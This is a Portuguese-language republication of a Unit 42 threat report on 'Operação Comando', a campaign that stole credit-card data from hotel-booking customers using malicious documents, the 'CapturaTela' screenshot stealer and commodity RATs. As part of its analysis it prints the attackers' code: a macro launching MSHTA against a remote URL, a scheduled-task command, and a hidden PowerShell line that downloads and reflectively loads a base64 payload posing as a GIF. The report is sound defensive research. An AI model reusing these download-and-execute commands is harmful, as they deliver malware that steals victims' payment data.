Como hackers executaram um negócio barato

  • Imprimir

cartao_shutterstock2.jpg15/03/2019 - *Esta é uma publicação do blog da Unit 42, unidade de pesquisa da Palo Alto Networks. Para análise completa, visite o link (em inglês):
Em dezembro de 2018, os pesquisadores da Unit 42 da Palo Alto Networks identificaram uma campanha em andamento com um forte foco no setor de hospitalidade, especificamente em reservas de hotéis. Embora nossa análise inicial não mostrasse nenhuma técnica nova ou avançada, observamos forte persistência durante a campanha que desencadeou nossa curiosidade.

Seguimos os rastros de rede e nos baseamos nas informações deixadas por esse indivíduo, como diretórios abertos, metadados de documentos e peculiaridades binárias, que nos permitiram encontrar um malware feito sob medida, que chamamos de "CapturaTela". Nossa descoberta desta família de malware mostra o motivo do foco persistente nas reservas de hotéis como um vetor principal: roubar informações de cartão de crédito dos clientes.

Analisamos estas ameaças e isso resultou na descoberta não apenas de seus mecanismos de entrega, mas também de seu arsenal de ferramentas de acesso remoto e trojans de roubo de informações, ambos adquiridos em fóruns clandestinos e em ferramentas de código aberto encontradas nos repositórios do GitHub.

Alguma vez você já se perguntou como uma pessoa pode administrar um negócio underground de dados de cartão de crédito muito barato e eficaz? Bem-vindo à "Operação Comando".

Mecanismos de entrega de malware do atacante

Nossa telemetria para essa campanha identificou o e-mail como o principal mecanismo de entrega de malware e descobriu que as primeiras amostras relacionadas foram distribuídas em agosto de 2018. Os tópicos usados pelo ator geralmente estão relacionados a reservas de viagem e vouchers e têm como alvo principalmente vítimas brasileiras. A Tabela 1 mostra uma lista representativa de assuntos típicos e nomes de anexos encontrados durante a campanha.


Tabela 1 Alguns assuntos de e-mail e nomes de anexos representativos desta campanha

Ao investigar os documentos maliciosos usados na campanha, descobrimos uma consistência interessante nos metadados do documento. O autor utiliza consistentemente um acrônimo durante todo o trabalho - "Original C.D.T" (veja detalhes na Figura 1).

Figura 1 Exemplo de metadados de documentos maliciosos

Os invasores fazem uso de vários métodos comuns, de prateleira, que são observados em muitas campanhas, como referências externas a scripts remotos executados pelo MSHTA (executável do Windows – malwares podem se disfarçar deste arquivo legitimo). Seguindo essa abordagem, esse ator pode encontrar várias ferramentas e recursos para executar suas atividades e, ao mesmo tempo, dificultar a atribuição e o rastreamento para os analistas.

Como exemplo de uma entrega de e-mail usada durante as campanhas de dezembro de 2018, vamos ver o que pretendia ser uma lista de alojamento (SHA256: ac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187).

Os documentos maliciosos contêm uma macro simples, que executa um script hospedado remotamente usando MSHTA:

Public Sub Auto_Open()

var0 = "MSHTA http://bit[.]ly/2QXNTHi"

Var = var0

Shell (Var)

End Sub

O URL de destino: hxxps://internetexplorer200[.]blogspot[.]com/

As estatísticas do link encurtado por URL em bit.ly confirmam as observações de nossa telemetria, mostrando as metas principalmente no Brasil, conforme ilustrado na Figura 4.

Figura 4 Distribuição da campanha Bit.ly nos dias 27 e 28 de dezembro

O MSHTA executa conteúdos VBScript que são codificados / ofuscados usando um algoritmo muito simples (observe a presença de palavras em português em todo o código).

Código VBScript de primeiro estágio executado via MSHTA

Isso resulta na seguinte tarefa agendada criada no sistema, em que um novo script de segundo estágio é invocado via MSHTA a partir de outro local remoto. Observe que o código VB do segundo estágio contém uma referência a "CDT" em um comentário.

"set shhh = CreateObject(\"WScript.Shell\")\r\n Dim var1\r\n var1 = \"cmd.exe /c SchTasks /Create /sc MINUTE /MO 240 /TN AdobeUpdateSD /TR \"\".exe http://minhacasaminhavidacdt.blogspot[.]com/\"\r\nshhh.run var1, vbHide\r\n"

Script VB de segundo estágio

Esse código VBScript de segundo estágio acaba carregando uma carga útil final na memória por meio do reflexo do PowerShell, buscando o conteúdo binário de um arquivo com uma extensão GIF:

"CreateObject(\"Wscript.Shell\").run \"cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [Reflection.Assembly]::Load([Convert]::FromBase64String((New-Object Net.WebClient).DownloadString ('http://achoteis.com[.]br/images/64.gif'

))).EntryPoint.Invoke($null,$null)\"\r\n"

O payload final entregue neste caso é o RAME (Revenge Remote Access Trojan), uma ferramenta de commodity que pode ser usada para facilitar o roubo de informações.

Análise de Infraestrutura

No nível da infraestrutura, o invasor faz uso de serviços dinâmicos de DNS (DDNS), como DuckDNS, WinCo ou No-IP, muitos dos quais oferecem contas gratuitas diminuindo o investimento necessário para a infraestrutura do invasor. Alguns exemplos dos domínios em uso são detalhados na Tabela 2.

Dominios de DNS Dinâmicos

systenfailued.ddns[.]com[.]br

office365update[.]duckdns[.]org

cdtoriginal[.]ddns[.]net

Exemplos de domínios associados a essa campanha usando provedores de DDNS

Além de usar serviços gratuitos, colar sites e uso de sites comprometidos, também identificamos pelo menos um domínio que parece ser de propriedade de ator. O domínio "fejalconstrucoes [.] Com [.] Br" tem sido usado para hospedar cargas úteis, bem como enviar e-mails para vítimas em potencial. Figura 7 O registro DNS WHOIS mostra detalhes sobre o domínio, que foi registrado usando o serviço UOL no Brasil.

Figura 7 Registro do DNS WHOIS

Os e-mails com anexos maliciosos pertencentes a esta campanha foram encontrados com as seguintes características:

Domain: fejalconstrucoes[.]com[.]br

Email Senders: O endereço de e-mail address está sendo protegido de spambots. Você precisa ativar o JavaScript enabled para vê-lo., O endereço de e-mail address está sendo protegido de spambots. Você precisa ativar o JavaScript enabled para vê-lo.

Attachment names: Contrato Anual FEJAL Construçoes.ppa

Como mencionado anteriormente, um detalhe interessante em domínios e caminhos usados pelo invasor é o uso do acrônimo recorrente "CDT", como por exemplo:

hxxp://bit[.]ly/cdtqueda

hxxp://cdtoriginal.ddns[.]net

Identificando o driver principal do negócio: "CapturaTela"

Durante nossa investigação, um diretório aberto identificado nos permitiu encontrar várias cargas úteis usadas pelo invasor. Abaixo o conjunto de cargas e documentos encontrados. O acrônimo "CDT" continua aparecendo mesmo nos nomes de arquivos.

Conteúdo encontrado em um diretório aberto no cdtmaster [.] Com [.] Br

Apesar do nome do arquivo, "quasar.jse" não é QuasarRAT, mas sim um script JS que contém um dropper de payload codificado em base64, com uma carga útil muito simples e interessante para nossa investigação.

Dropper de payload de base64 JS

A carga decodificada é um arquivo PE, escrito em .NET, com recursos de roubo de informações. Um de seus principais métodos dá nome à nossa família de malware "CapturaTela" e, como seu nome em português indica, tem a capacidade de salvar uma captura de tela em um objeto Bitmap.

CapturaTela method's screen capture capabilities.

A principal funcionalidade deste trojan de roubo de informações é a seguinte

- Iterar sobre a lista de processos abertos e verificar títulos de janela específicos. O título deve conter "ls. B" ou "o. B" para a amostra realizar outra atividade.

- Se o título for encontrado, uma captura de tela será tirada e enviada por e-mail como um anexo JPEG.

- Ele eliminará os processos existentes do Chrome quando concluído. Os títulos das janelas provavelmente se baseiam no conteúdo das tags do Chrome.

Recursos de exfiltração de e-mail do CapturaTela

Para validar a funcionalidade, decidimos criar uma página da Web simples que correspondesse ao conteúdo do título e corrigimos a amostra mal-intencionada para usar uma conta de e-mail de teste sob nosso controle.

Testar página HTML e depurar a funcionalidade do CapturaTela. Como resultado, confirmamos o formato e o conteúdo das informações exfiltradas que o atacante planejava coletar de suas vítimas.

E-mail recebido com dados exfiltrados

Então, a única questão que restava para nossa investigação era o tipo de conteúdo e títulos de janela que esse trojan de roubo de informações estava procurando? Quais tipos de páginas da Web podem conter "ls · B" ou "o · B" como parte de seu título?

Inicialmente, encontrar um site com essas propriedades parecia ser uma tarefa impossível, mas começamos a pesquisa com base no que sabíamos sobre os metadados de segmentação e envio de e-mails usados nessas campanhas. Com esses dados, pudemos identificar possíveis websites de destino contendo determinados termos, mas comuns ao setor e à natureza da empresa, nos títulos das páginas dos sites, em inglês e português, que correspondessem à correspondência de padrões de string descrita acima e invoque os recursos de roubo de cartões de crédito do malware. Os websites encontrados nos levam ao fato de que o foco do invasor é obter os detalhes completos do cartão de crédito da vítima durante um determinado processo de compra.

Depois de analisar várias amostras do CapturaTela e extrair o conteúdo da parte de configuração do e-mail, várias sequências interessantes foram encontradas.

Interesting strings

Comando30

Comando30@cdt

comando50

Strings interessantes em configurações de email

O uso contínuo do acrônimo "CDT" e a presença da palavra "Comando", que poderíamos associar à primeira letra, nos levaram a escolher a "Operação Comando" para descrever essa campanha.

Uso extensivo de Trojans de Acesso Remoto

Além do uso do trojan personalizado CapturaTela, o ator faz uso extensivo de vários outros trojans de acesso remoto para executar suas atividades maliciosas. As seguintes famílias do RAT foram observadas durante a campanha do ator.

- RAT Family

- LimeRAT

- RevengeRAT

- NjRAT

- AsyncRAT

- NanoCoreRAT

- RemcosRAT

Tabela 5 Principais famílias de RAT observadas nesta campanha

O uso extensivo dessas ferramentas de RAT potencialmente aumenta os objetivos de negócios, dada a quantidade de informações que o ator pode obter sobre os resultados de compra de cartão de crédito roubados dos sites-alvo por meio de vítimas infectadas.

Existem vários exemplos de famílias RAT usadas que podem ser encontradas no GitHub, como:

http://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

http://github.com/NYAN-x-CAT/Lime-RAT

Sobrepõe-se a outras pesquisas publicadas

Alguns dos domínios e amostras encontrados nesta investigação já foram pesquisados e relatados por Yoroi. Com base nos detalhes de nossa pesquisa, acreditamos que, apesar de algumas pequenas sobreposições nas técnicas utilizadas, essa campanha não está relacionada ao Gorgon Group.

Conclusões

A Operação Comando é uma campanha de cibercrime puro, possivelmente de origem brasileira, com um foco concreto e persistente no setor hoteleiro, que comprova como um agente de ameaça pode ser bem-sucedido na busca de seus objetivos, mantendo um orçamento baixo. O uso de serviços DDNS, ferramentas de acesso remoto disponíveis publicamente e ter um conhecimento mínimo sobre desenvolvimento de software (neste caso, VB.NET) foi suficiente para executar uma campanha com duração de um mês e coletar potencialmente informações de cartão de crédito e outros dados.

Enquanto campanhas de cibercrime como essa permanecem ativas, os clientes da Palo Alto Networks estão protegidos contra essas ameaças das seguintes maneiras:

- WildFire detecta todos os documentos maliciosos e payloads entregues como malware.
- Clientes do AutoFocus podem acompanhar esta campanha usando a seguinte tag
- TRAPS bloqueia todos os arquivos associados a essa campanha.

A Palo Alto Networks compartilhou nossas descobertas, incluindo amostras de arquivos e indicadores de comprometimento, neste relatório com nossos colegas membros da Cyber Threat Alliance. Os membros da CTA usam essa inteligência para implantar rapidamente proteções para seus clientes e para interromper sistematicamente os cibercriminosos. Para mais informações sobre a Cyber Threat Alliance, visite cyberthreatalliance.org

Crédito: Imagem cartões / Shutterstock

Deixar seu comentário

0
termos e condições.
  • Nenhum comentário encontrado